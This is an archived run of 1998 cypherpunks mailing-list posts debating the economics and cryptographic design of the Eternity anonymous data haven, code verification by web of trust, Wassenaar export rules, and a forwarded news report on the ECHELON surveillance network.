reasons that really important data should be expensive to get initialy. It
goes back to what I was saying in a previous post about Grace Hoppers
worth-v-time model.

> Data disappears from Eternity once no one cares enough about it to pay to
> have it stored.

What this over-looks is the potential for that data to become relevant to
some currently unknown situation in the future. While I agree that the data
should not necessarily be in a fast medium storage after a certain time
period it should not simply be thrown away. If nothing else at some point it
will have historical (inexpensive, it's still money) relevance.

> Providing eternity service costs money.

Life costs money, that is one of the reasons that you don't want to throw
stuff away that may bring in income down the road.

> Anything which lets users circumvent
> this opens up the potential for denial of service through consumption of
> resources attacks.

There simply isn't a way around that except to out bandwidth the attacker.

> Even if billing is fundamental, you still have the
> potential for the NSA to spend $100m to buy all the eternity space available
> at any point.
>  This is why you also need market mechanisms
> -- if the NSA
> is willing to pay a premium for eternity service just to keep it out of
> the hands of the populace, then running eternity servers is a great 
> investment, so capacity will increase until the NSA can no longer afford
> to buy all of it.

I like it when you write my own rebuttal for me...:)
The bottem line is that the market mechanism *is* the willingness of some
party to buy that space. Nothing more, nothing less. Further, Mallet ain't
stupid or he'd have starved a long time ago.

> A difficult part of designing a working Eternity service is to keep people
> from "stealing service", in terms of consumption of resources, during
> set up, indexing, etc.  Basically, you need to make sure that to the 
> greatest extent possible, anything which is a potentially scarce resource
> is sold, not given away.

The point is that *nothing* is given away for free, though you might want to
let people *give* you resources for free. Which is the point I was making.

> You then are vulnerable to someone spamming the system, unless you give
> the server operator some way of knowing if this encrypted data is likely
> to be valuable.

The point is that the system can *always* be spammed. You *don't* charge the
source of data a million dollars to put it on your server. It's gotta be
source cheap or else it isn't worth their time to bother with it. If you
*really* want to promote such servers what you need is a model that allows
submitters free access *and* a share in the subscribers fees. Then everyone
wins.

If the source has something they know is worth god awful sums of money they
aren't going to submit it to the data haven anyway, they'll set their own
haven up and reap the benefits directly. There is an economic issue here
that is at parity with the technical issues.

> You can have arbitrarily complex payment models, since the enforcement
> agents can exist (must exist?) as eternity objects in their own right.

Not really, at some point the complexity works against itself - you should
study a little chaos theory. The final point is to make the system (ie the
logical linking of black box operations that themselves may be quite
technical or complex) dirt simple.

> No, the most feasible attacks for a resourced attacker are custom ASICs
> optimized for key testing, as were recently described.  Distributed
> workstation cracking is a parlor trick if you have a billion dollar budget
> for key cracking.

Tell that to the NSA and their Cray-acres. The point is that even if you
have customer ASIC's or FPGA's or whatever these are still computers and you
can't seriously be suggesting that the resources to create customer hardware
for specific goals is any less complicated or more inexpensive than using
general purpose hardware when looked at from a global scale. If that model
were so generaly applicable then we should move all our processing jobs to
ASIC's and reap the benefits. There is also the issue that even if you use
customer chips to develop customer key cracking hardware (which I agree is
being done as we speak) there is still the inescapable fact that you will
need lots(!) of them. So the result is that whether they are custom or
general purpose devices the sheer quantity becomes a hinderance.

> The NSA has general purpose HPC resources for purposes like signal processing,
> AI, etc., not for brute forcing people's keys routinely (although perhaps for 
> a weak and nonstandard cipher, it would make sense to use general purpose
> machines).  Even a corporation would be better off using FPGAs or ASICs for
> key cracking once you get past 56 bits.

That would depend on the economics of startup and what kind of footprint
that would leave in the industry. This is one of the reasons that the NSA
builds their own chips.

> I assume the attacker is evil and rational.

My, my. Moral stipulations are probably no more relevant than psychological
classifications. The issue is one of emotion. Mallet wants it because it
benefits Mallet and hinders Mallets enemies. This is an emotional reason
and most definitely outside the bounds of simple rational/irrational action
classification. When I was speaking of psychology earlier in my submissions
I was not the least bit implying any comment on rationality, goodness, or
other relative classifications. I was refering to greed, pride, honor,
self-respect, etc. as motivations. The interactions of those in individuals
and organizations doesn't depend on classifications.

>  I also assume that the
> entire legal system has been subverted, and that extralegal operations of
> any size too small to make the new york times front page are possible.  And,
> any entity which deals with the government (just about any) can be subverted.

Any government can be subverted as well, happens on a regular basis. The
legal system may not need to be subverted for the simple reason that more
than one legal system may be involved. The front page example you are so
fond of is a instance that would take, my guess, probably in the
neighborhood of $10k to have a full page for a single day. To make the
participants investment in that sum worth it, what is their pay off in your
system? Just having their name in the paper probably isn't worth it. The
wide public advertisment, and hence notoriety is probably not a big plus
either. Especialy considering that it would guarantee the participant a nice
bug-for-life experience.

> Thinking that the major internet gateways between providers are bugged by
> the NSA isn't really too unreasonable if you accept those assumptions.

Whether the providers themselves are bugged are not is really irrelevant,
its the backbone infrastructure providers who are providing the access points.
You tap the satellite transfer point, for example, not the 300 organizations
sending data down it. You tap the telephone switch in each neighborhood, not
the individual lines on their subscriber end trunks.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sun, 18 Jan 1998 22:40:22 +0800
To: matt.barrie@stanford.edu
Subject: Re: (eternity) Eternity as a secure filesystem/backup medium
In-Reply-To: <3.0.5.32.19980117194905.008024e0@pobox1.stanford.edu>
Message-ID: <199801181320.NAA00296@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




[horrible line wraps btw. 100 chars to the line! I reformatted.]

Matt Barrie writes:
> Since documents cannot be retracted or re-encrypted you really have
> to assume that someday they will be broken. This really turns the
> notion of what crypto to use for encrypting eternity documents into
> an upfront question of "how long do I want this information to be
> secure?". 20 years? 50 years?  100 years?

There are 3 distinct threats.

1. communications crypto used by the author in submitting the document
   is broken

2. the eternity architecture contains encrypted documents to frustrate
   attempts to locate documents, and to hide the contents of documents
   from individual servers

3. communications crypto used to request and deliver documents is
   broken thus revealing the readers identity

For threat 1. the attacker needs archives of old communications which
could potentially be eternity submissions.  (I say potentially because
they could be steganographically encoded).  It is probably reasonable
to assume that the NSA has a full historic archive of USENET.  Also it
is probably reasonable to assume they have a historic archive of all
inter remailer traffic.

For threat 2. it seems feasible to upgrade this security over time, in
that documents could be super encrypted with newer ciphers when
vulnerabilities are found in older ciphers.  No protection for
historic access requests, but at least we can adapt to protect new
requests.

For threat 3. again newer ciphers can be used as attacks are found.


So it is useful to design upgrade paths for ciphers into the protocols
where possible.

Other approaches we could take are to use very conservative cipher key
sizes and protocols combining multiple ciphers in ways which gives us
the security of the best of the ciphers.

For example:

	R = random, C = 5DES( R ) || blowfish-484( M xor R )

Where 5DES is say E-D-E-D-E with 5 independent DES keys.

Constructs to combine in strong ways hash functions, macs, symmetric
and asymmetric ciphers would be useful.  Is there much research in
this area?

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Young iVillian" <lordsmen@iquest.net>
Date: Mon, 19 Jan 1998 03:23:24 +0800
To: <cypherpunks@toad.com>
Subject: to Anonymous
Message-ID: <199801181905.LAA04320@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Right on, man.  E-Mail me... I'd like to have a conversation w/ you.

Technological takeover... we bring it on ourselves.  We have no one to
blame.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 19 Jan 1998 07:00:58 +0800
To: Adam Back <jya@pipeline.com
Subject: Re: New Software Controls
In-Reply-To: <1.5.4.32.19980117020259.00733f54@pop.pipeline.com>
Message-ID: <3.0.5.32.19980118144309.00868e80@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



(Wasenaar discussion...)
>>    You might want to highlight the following section ... not sure of the 
>>    entire context ... but this isn't something that I'd seen before. It looks
>>    like control of any software that can transmit data.
>> 
>>        c.3. ``Software'' which provides the capability of recovering
>>        ``source code'' of telecommunications ``software'' controlled by
>>        5A001, 5B001, or 5C001;
>Export ban on decompilers?  Disassemblers?  Debuggers?
>These tools are general purpose, so this seems particularly weird.

It's only weird if you assume the authors have a clue...
Depending on the overall context, telco software companies and their
customers may find this section interesting as well.

If they were thinking at all when they wrote this, they were probable concerned
about products that let people ship exportable binaries and patchtools
that let users recover the source code to undo the limitations.

But as you say, general purpose tools work fine.  The special purpose
tools I've seen have been the ones that patch the binaries of Netscape
40-bit versions to reenable 128-bit capability, and they just use binary.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 19 Jan 1998 04:26:46 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: (eternity) Eternity as a secure filesystem/backup medium (fwd)
Message-ID: <199801182053.OAA18106@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 18 Jan 1998 12:02:34 -0800
> From: Kent Crispin <kent@songbird.com>
> Subject: Re: (eternity) Eternity as a secure filesystem/backup medium (fwd)

> There are alternative ways of paying for the service that do not in
> any way depend on ecash, and after thinking about it a bit, they seem
> more robust, as well. 
> 
> The basic idea is as follows:  The fundamental eternity service is 
> free to readers, and is financed entirely by writers.  The writers 
> supply the disk space, the network bandwidth, and possibly pay for 
> the software to support all this.

It is clear that there are two diametricaly opposed models of payment
mechanisms and who those costs should fall on; producers or consumers.
I personaly have no faith in systems where the producers bear the burden of
the costs since they have no clear mechanism to obtain the funds to finance
the enterprise in the first place.

Imagine for a moment that a couple of persons come into possession of a set
of documents which would cause considerable political embarassment and legal
difficulties for a head of the local government.

Why should these two individuals pay to have their data dissiminated to
anyone who wants it? It certainly isn't going to improve their social,
political, or professional standing since the server will anonymize the
data. They then have two options, release it themselves and hope for the
best (and hence reap the benefit of any economic benefits that might acrue)
or do nothing with it.

How about information to build man portable atomic bombs? It doesn't make
sense to take all those chances and the data haven operators to take the
chances when they will get at most the monetary input from a *single* party.
It is clear that these resources are clearly inferior to many parties paying
to get the data.

I guess the question boils down to why the individual operator in running
the server in the first place. I assume a priori that the goal of both the
submitter and the operator is to make a reliable income from the users of
the service since there are clearly many more consumers of information than
producers of it.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Uhh...this is Joe [Randall Farmer]" <rfarmer@HiWAAY.net>
Date: Mon, 19 Jan 1998 05:10:10 +0800
To: Ryan Lackey <rdl@mit.edu>
Subject: Re: (eternity) Eternity as a secure filesystem/backup medium
In-Reply-To: <199801181433.JAA13137@the-great-machine.mit.edu>
Message-ID: <Pine.OSF.3.96.980118120559.31709E-100000@fly.HiWAAY.net>
MIME-Version: 1.0
Content-Type: text/plain



...
> (provided back door attacks, fundamental breakthroughs in cryptography, etc. 
> are not made...a bet I'm forced to make, even though I don't like it)

You can tilt the odds in your favor some at the cost of speed; use more rounds
for the block ciphers and base your public-key security on two hard problems,
not one (i.e., encrypt randomness with one public-key cryptosystem and encrypt
the key XORed with this randomness with an algorithm based on an unrelated hard
problem). That means much more work, but the insurance against improvements in
math/crypto is worth it, I'd think.

...
> Actually, Eternity is no different than emailing a file, given a SIGINT
> capability at the attacker which allows all internet traffic to be monitored.
> If the data is still relevant and worth breaking in 50 years, they could
> just intercept the encrypted email, store it in a government vault for
> 50 years, then attack it...

It *is* a little different, actually; confidential messages are rarely relevant
in 50 years (and even when they are, NSA doesn't know which messages are
relevant and which aren't), whereas authors must remain anonymous until they're
sufficiently dead that they can't be hurt (and NSA *does* have more of an idea
of which documents need to be looked into, since they know their contents).

...
> 
> - -- 
> Ryan Lackey
> rdl@mit.edu
> http://mit.edu/rdl/		


---------------------------------------------------------------------------
Randall Farmer
    rfarmer@hiwaay.net
    http://hiwaay.net/~rfarmer






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Wienke <JonWienk@ix.netcom.com>
Date: Tue, 20 Jan 1998 11:10:04 +0800
To: <eternity@internexus.net
Subject: Re: (eternity) Eternity as a secure filesystem/backup medium
In-Reply-To: <tw790sdllr5.fsf@the-great-machine.mit.edu>
Message-ID: <3.0.3.32.19980118151314.006b7d88@popd.netcruiser>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


At 01:04 PM 1/18/98 -0600, Jim Choate wrote:
>The point is that the system can *always* be spammed. You *don't* charge
the
>source of data a million dollars to put it on your server. It's gotta be
>source cheap or else it isn't worth their time to bother with it. If you
>*really* want to promote such servers what you need is a model that allows
>submitters free access *and* a share in the subscribers fees. Then
everyone
>wins.
>
>If the source has something they know is worth god awful sums of money
they
>aren't going to submit it to the data haven anyway, they'll set their own
>haven up and reap the benefits directly. There is an economic issue here
>that is at parity with the technical issues.

Here is a way for an individual to make money using the eternity service:

1:  Users are charged $/MB/month to store data in the service.

2:  Users are charged $/MB for downloading data from the service.

3:  The source of a data item receives a portion of the download fees
collected for that item as an anonymous payment, or else the money could be
applied toward keeping the data on the service (the option of choice for
the really paranoid among us).


At 12:02 PM 1/18/98 -0800, Kent Crispin wrote:
>In a little more detail: you have say 1 megabyte of data that you
>would like to be stored in the Eternity Service.  The overhead of
>storage in eternity is a factor of two, and you would like 10 times
>redundancy.  So you contact the Eternity Service Software provider, and 
>get the software.  You then configure the software to supply 20 
>megabytes of your disk space to the system.  This allows you to 
>supply 1 meg of your own data.
>
>The 20 megs will of course not store *your* data -- it will store
>other eternity data.  The service takes your data and spreads it
>across 10 other sites, whose locations are unknown and unknowable to
>you.  In return, you are storing eternity data for other users.  If
>your disk space becomes unavailable your file disappears from the
>service.  (Of course, someone else could pick it up and store it, if
>it was valuable information.)

The location of the data should be determined by some sort of random
process, and it should move frequently.  Disallowing one to store one's own
data reduces the number possible locations for the data, and also requires
a mechanism for matching the source of the data to the owner of each node-
both of which are Really Bad Karma.

>This is a self-financing model.  Every writer to the eternity service
>pays for their own bandwidth and disk space.  The eternity service
>provider is financed by maintaining the software that all the writers
>use -- client/server software will have to run on many different
>platforms, some protocols may be better than others, and it might be 
>worth buying your eternity software from a high-reputation 
>("trustworthy") provider.

One could also construct a fee schedule where a higher rate would buy a
higher redundancy level for your data.

>Note that this doesn't mean that data suppliers can't be paid for
>providing data -- but that is a completely separable problem that can
>have many different solutions.
>
>I believe this approach does solve the financing part.  But it does
>make the rest a *very* complicated problem -- you have a dynamic,
>self-configuring network of data sources and sinks, with all the
>configuration data encrypted along with the data.  Ideally, of course,
>the data would be migrating constantly. 
>
>Retrieval would probably be very slow -- basically email speeds, or 
>worse.  In fact, perhaps the data would be retrieved by having the 
>eternity service use the remailer network to send it...

The eternity service should be its own remailer network--one that transfers
data as well as e-mail.  The nodes should have constant encrypted cover
traffic between them.

-----BEGIN PGP SIGNATURE-----
Version: PGP for Business Security 5.5

iQA/AwUBNMKMicJF0kXqpw3MEQJ/sACfQpkRqLflEPdmr4NpsP/8w7WEmvIAnjvv
LSkxnt7fdHwkCk37vMWf/q1A
=P6/D
-----END PGP SIGNATURE-----


Jonathan Wienke

PGP Key Fingerprints:
7484 2FB7 7588 ACD1  3A8F 778A 7407 2928
3312 6597 8258 9A9E D9FA  4878 C245 D245 EAA7 0DCC

"If ye love wealth greater than liberty, the tranquility of servitude
greater than the animating contest for freedom, go home from us in peace.
We seek not your counsel, nor your arms. Crouch down and lick the hand that
feeds you. May your chains set lightly upon you; and may posterity forget
that ye were our countrymen."
-- Samuel Adams

"Stupidity is the one arena of of human achievement where most people
fulfill their potential."
-- Jonathan Wienke

Never sign a contract that contains the phrase "first-born child."

When the government fears the people there is liberty.
When the people fear the government there is tyranny.
Those who live by the sword get shot by those who don't. 

RSA export-o-matic:
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Uhh...this is Joe [Randall Farmer]" <rfarmer@HiWAAY.net>
Date: Mon, 19 Jan 1998 05:26:22 +0800
To: cypherpunks@ssz.com
Subject: Re: how to release code if the programmer is a target for (fwd)
Message-ID: <Pine.OSF.3.96.980118150957.10460A-100000@fly.HiWAAY.net>
MIME-Version: 1.0
Content-Type: text/plain



[Choate said he wouldn't "address" my message if I didn't post it to the list,
so...]

> > Eternity delivers data.  It's up to the user to verify that the data is
> > what they want
> 
> > The original question was how to verify the eternity server source code.
> 
> Assume for a moment that as a user of an eternity server the source is the
> data I want.

Ok...

[...]
> > * A random user who has the public keys of at least (thresh) number of the
> > cypherpunks, optionally the key of the author of the document/product before
> > the system becomes questionable, perhaps by looking in the NY Times
> > for 1 Jan 1999 which has a full page ad taken out by Cypherpunks Anonymous
> > with the PGP public keys for the 100 leading cypherpunks.
> 
> Pretty expensive and rather unrealistic I suspect. 

The NYT ad? I think that was at least partly a joke (besides, if some
cypherpunks did take out an ad, I'd predict propaganda in 2/3 of the page and
fine-print PGP-key fingerprints in the rest :).

> Where does this random user come from? 

Why does it matter? As long as she's competent enough to choose good verifiers
and verify that those verifiers verified the code in question, it all works out
in the end. 

> What is '(thresh)'? What good would an anonymous key signature provide? 

Thresh is the number of signatures from trusted people/keys required to trust a
section of code, a value set by the user. An anonymous sig would be very little
good but I think he was talking about including the author's sig if he's not
anonymous. 

> [...] How do we know that some number of these cypherpunks aren't turned? 

We don't. There is no way to operate without *some* trust; this reduces it from
the code being shown to be secure if the author is not spookized AND The author
is capable to check his/her code AND the key he signed it with is good to the
code being good if those conditions are true for one (or a few) of the many
cypherpunks on the user's trusted list who signed the code. 
	
> Are you proposing that the user test all 100 of the signatures? 

Well, I think he's proposing to have a script check them and the user
personally make sure the script is doing what it should.

> Which realistica[l]ly is the only way to verify any given one of them. Not
> very many people will go to that extreme simply for grins and giggles.
> 
> > * The piece of code to be verified is bloody long, that is, longer than
> > any one cypherpunk can afford to verify alone (shooting practice,
> > installing the minefields and poison gas sprinkler system, etc. take
> > lots of time)

Not to mention churning out that propaganda for the NYT ad, becoming tolerant
to pepper spray, preparing various fake identities for use, proving Blowfish
secure and then breaking it, constructing a doomsday weapon using only a
straightedge and compass, etc.

> 
> The standard is programs over ~10k lines is not comprehensible by a single
> individual on a line by line basis.

Might be, but this code has to be more than just understood -- it must be
painstakingly checked for subtle flaws and bugs. Welcome to the world of
adversarial quality control.

> 
> > * The user can tell by visual inspection that a small compilation
> > system does what they want it to do, and can understand basic logic
> > enough to tell what signatures imply.
> 
> 'small compilation system' of what? What who wants it to do? The author?
> Mallet? The end user?

The C/Java/whatever compiler, I suppose, and also the signature checker, and
she's checking that they carry out their stated purposes.

...
> > 2) The user wants to run the code, because it's Just That Cool.
> 
> We're talking here about users who want to get data that is illegal or
> otherwise incriminating or dangerous to one group or another. In particular
> let's consider the situation of a Lebanese freedom fighter in Isreal or
> perhaps a 'Free Burma' revolutionary in China.

I think the issue was one of users who want to get eternity server source they
can trust -- not necessarily getting it *from* Eternity. 

> 
> > 3) No one can verify the entire code.  So, Cypherpunks begin signing
> > small sections of the code with their own previously-established key.
> > Their keys are established as their reputation is established on
> > the list, or perhaps by personally meeting these people, in the
> > traditional PGP web of trust scheme.  There is no central Cypherpunks
> > Registry, just a decentralized mesh.
> 
> Which doesn't effect the ability of Mallet to resign that code at the users
> end in order to break the users local security.

Unless you're exposing a new weakness in the trust model PGP uses, Mallet can't
do that, providing the user has done good key authentication and hasn't listed
one of Mallet's goons as a trusted code-verifier.

> 
> > 4) The user executes the compilation script.
> 
> [material describing script verification deleted]
> 
> Mallet can re-write said script [...]

Yup, that's why the user has to check it by hand. Lots easier to check a script
and a compiler for doing their functions than to check an eternity server for
subtle bugs. 

> 
> > I fail to see how the specifics of Eternity are relevant -- it's
> > just basically a PGP web of trust issue.  The transport is irrelevant --
> > it's untrusted code until it's been verified by people the user
> > trusts.
> 
> The end user may not have people available to trust is the point.

Well, if you can't verify it yourself and you can't trust other people to
verify it, my advice is to give up; you cannot be sure of *any* public keys in
that case, so any message you encrypt might be encrypted to one of Mallet's
keys; any sig you check might be signed by one of Mallet's keys.

> The reason the transport mechanism is relevant is that it is much easier to
> spoof a verification script if the user is not going to be surprised with 24
> hour turn around on requests, whereas a responce time measured in minutes
> lessens the window of opportunity to Mallet significantly. 

If Mallet is a NSA spook who's half as good as my hacker buddy Phat Atta and
knew about the script ahead of time, the user can't trust the script without
verifying it herself, whether it takes milliseconds or millenia to get the
response. 

> 
> It may come as a surprise to you and others but not everyone in the world
> can pick up a phone and call a 100 people all over the world and not raise
> some suspicion.

Ah, but either I am more mistaken than usual or you only need a few of the
signers to be trusted, not all of them. 

> 
> > Implementing a keyserver in Eternity has the same issues
> 
> While it is perfectly permissible to design Eternity or any data haven with
> inherent key servers, I believe it is a bad idea from a design perspective
> because it makes the code even larger, decreases the potential for monetary
> motives for indipendant key servers to appear, and if the server is
> compromised then the key server is also. 

Not sure, but I think he's talking about putting up a key server in Eternity
(i.e., the rolling hills where data can roam without fear, as opposed to
putting it in the Eternity). 

> It is more expensive if Mallet can be forced to deal with two [independent]
> operators then a single monolithic operator. 
> 
> [rest deleted]

---------------------------------------------------------------------------
Randall Farmer
    rfarmer@hiwaay.net
    http://hiwaay.net/~rfarmer







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Mon, 19 Jan 1998 04:28:46 +0800
To: cypherpunks@toad.com
Subject: Other c'punk lists?
Message-ID: <964b42d2ad6119da33ff9f4184394baf@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



Hi
are there any other cypherpunk lists?  With all due respect
this list has a *lot* of noise <g>  Perhaps something with-
out the anarchy.  I enjoy the wild side of this list but
I would also like something more targeted.


Thanks in advance









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 19 Jan 1998 07:45:22 +0800
To: Steve Mynott <aba@dcs.ex.ac.uk>
Subject: Re: non-transferable signatures (Re: Crypto Kong penetration.)
Message-ID: <199801182338.PAA13453@proxy4.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
At 10:48 PM 1/16/98 +0000, Steve Mynott wrote:
> SMIME of course despite bad cypherpunk karma is easy and
> maybe even  works between mailers.

Easy indeed, if all the keys from Verisign are correct and
secured.

It is indeed very easy to use SMIME.

To use it so that it actually accomplishes the intended
result is not so easy. 

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     Np4QfrajG+6u2ZHUc2AFBH0uTX9nCJxCUi7E2bpk
     3CGDysj2FaqaZYBM4bRe6dvLCkbb0ltwLns5aFPQ9
 ---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of 
the kind of animals that we are. True law derives from this right, 
not from the arbitrary power of the state.

http://www.jim.com/jamesd/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 19 Jan 1998 06:26:04 +0800
To: cypherpunks@toad.com
Subject: Re: uh,
In-Reply-To: <199801181249.MAA00208@server.eternity.org>
Message-ID: <gaTiJe29w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Back <aba@dcs.ex.ac.uk> writes:
>
> Bill Payne used to work for one of the US national labs, he did some
> work funded by NSA at that lab.  He considered that the NSA were
> making incompetent cryptographic decisions endangering national
> security.
>
> He's suing them over their attempts to silence his criticisms by
> working behind the scenes to deprive him of research funding.
...

Bill Payne was with Sandia national lab (where they quite a bit of crypto work)
Bill claims to have discovered a very fast factorization algorithm using shift
registers, which he refuses to publish. While I haven't seen the algorithm, I
believe he may well be right.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 19 Jan 1998 06:13:29 +0800
To: cypherpunks@cyberpass.net
Subject: Fwd: Internet security (VERY LONG)
Message-ID: <v04003981b0e8296631c0@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Subject: Fwd: Internet security (VERY LONG)
Date: Sun, 18 Jan 98 12:34:36 -0500
From: Somebody
To: "Robert Hettinga" <rah@shipwright.com>
Mime-Version: 1.0


---------------- Begin Forwarded Message ----------------
Date:        01/17  3:25 PM
Received:    01/17  5:24 PM
From:        Richard Fairfax, richard_fairfax@compuserve.com
Reply-To:    CSA Talk, csa@blueworld.com
To:          CSA Talk, csa@blueworld.com

The following forwarded mail may have implications for clients with
sensitive data. The field encription features in Troi FM Plug-in could
prove to be a valuable asset.

Richard Fairfax
Oakwood Designs

---forwarded mail START---
From: gp-uk@mailbase.ac.uk,Net
-----------------------------------------------------------------------
Aus: z-netz.datenschutz.spionage:

 A GLOBAL electronic spy network that can eavesdrop on every telephone,
 email and telex communication around the world will be officially
 acknowledged for the first time in a European Commission report to be
 delivered this week.

 The report - Assessing the Technologies of Political Control - was
 commissioned last year by the Civil Liberties Committee of the European
 Parliament. It contains details of a network of American-controlled
 intelligence stations on British soil and around the world, that
 "routinely and indiscriminately" monitor countless phone, fax and email
 messages.

 It states: "Within Europe all email telephone and fax communications
 are routinely intercepted by the United States National Security Agency
 transfering all target information from the European mainland via the
 strategic hub of London then by satellite to Fort Meade in Maryland via
 the crucial hub at Menwith Hill in the North York moors in the UK."

 The report confirms for the first time the existence of the secretive
 ECHELON system.

 Until now, evidence of such astounding technology has been patchy and
 anecdotal. But the report - to be discussed on Thursday by the commit-
 tee of the office of Science and Technology Assessment in Luxembourg -
 confirms that the citizens of Britain and other European states are
 subject to an intensity of surveillance far in excess of that imagined
 by most parliaments. Its findings are certain to excite the concern of
 MEPs.

 "The ECHELON system forms part of the UKUSA system (see 'Cooking up a
 charter for snooping') but unlike many of the electronic spy systems
 developed during the Cold War, ECHELON is designed primarily for non-
 military targets: governments, organizations and businesses in vir-
 tually every country.

 "The ECHELON system works by indiscriminately intercepting very large
 quantities of communications and then siphoning out what is valuable
 using artificial intelligence aids like MEMEX to find key words".

 According to the report, ECHELON uses a number of national dictionaries
 containing key words of interest to each country.

 For more than a decade, former agents of US, British, Canadian and New
 Zealand national security agencies have claimed that the monitoring of
 electronic communications has become endemic throughout the world.
 Rumours have circulated that new technologies have been developed which
 have the capability to search most of the world's telex, fax and email
 networks for "key words". Phone calls, they claim, can be automatically
 analysed for key words.

 Former signals intelligence operatives have claimed that spy bases
 controlled by America have the ability to search nearly all data
 communications for key words. They claim that ECHELON automatically
 analyses most email messaging for "precursor" data which assists in-
 telligence agencies to determine targets. According to former Canadian
 Security Establishment agent Mike Frost, a voice recognition system
 called Oratory has been used for some years to intercept diplomatic
 calls.

 The driving force behind the report is Glyn Ford, Labour MEP for
 Greater Manchester East. He believes that the report is crucial to
 the future of civil liberties in Europe.

 "In the civil liberties committee we spend a great deal of time
 debating issues such as free movement, immigration and drugs.
 Technology always sits at the centre of these discussions. There
 are times in history when technology helps democratise, and times
 when it helps centralise. This is a time of centralisation. The
 justice and home affairs pillar of Europe has become more powerful
 without a corresponding strengthening of civil liberties."

 The report recommends a variety of measures for dealing with the
 increasing power of the technologies of surveillance being used at
 Menwith Hill and other centres. It bluntly advises: "The European
 Parliament should reject proposals from the United States for making
 private messages via the global communications network (Internet) a
 ccessible to US intelligence agencies."

 The report also urges a fundamental review of the involvement of the
 American NSA (National Security Agency) in Europe, suggesting that
 their activities be either scaled down, or become more open and
 accountable.

 Such concerns have been privately expressed by governments and MEPs
 since the Cold War, but surveillance has continued to expand. US intel-
 ligence activity in Britain has enjoyed a steady growth throughout the
 past two decades. The principal motivation for this rush of development
 is the US interest in commercial espionage. In the Fifties, during the
 development of the "special relationship" between America and Britain,
 one US institution was singled out for special attention.

 The NSA, the world's biggest and most powerful signals intelligence
 organisation, received approval to set up a network of spy stations
 throughout Britain. Their role was to provide military, diplomatic and
 economic intelligence by intercepting communications from throughout
 the Northern Hemisphere.

 The NSA is one of the shadowiest of the US intelligence agencies. Until
 a few years ago, it existence was a secret and its charter and any
 mention of its duties are still classified. However, it does have a Web
 site (www.nsa.gov:8080) in which it describes itself as being respon-
 sible for the signals intelligence and communications security activ-
 ities of the US government.

 One of its bases, Menwith Hill, was to become the biggest spy station
 in the world. Its ears - known as radomes - are capable of listening in
 to vast chunks of the communications spectrum throughout Europe and the
 old Soviet Union.

 In its first decade the base sucked data from cables and microwave
 links running through a nearby Post Office tower, but the communi-
 cations revolutions of the Seventies and Eighties gave the base a
 capability that even its architects could scarcely have been able to
 imagine. With the creation of Intelsat and digital telecommunications,
 Menwith and other stations developed the capability to eavesdrop on
 an extensive scale on fax, telex and voice messages. Then, with the
 development of the Internet, electronic mail and electronic commerce,
 the listening posts were able to increase their monitoring capability
 to eavesdrop on an unprecedented spectrum of personal and business
 communications.

 This activity has been all but ignored by the UK Parliament. When
 Labour MPs raised questions about the activities of the NSA, the
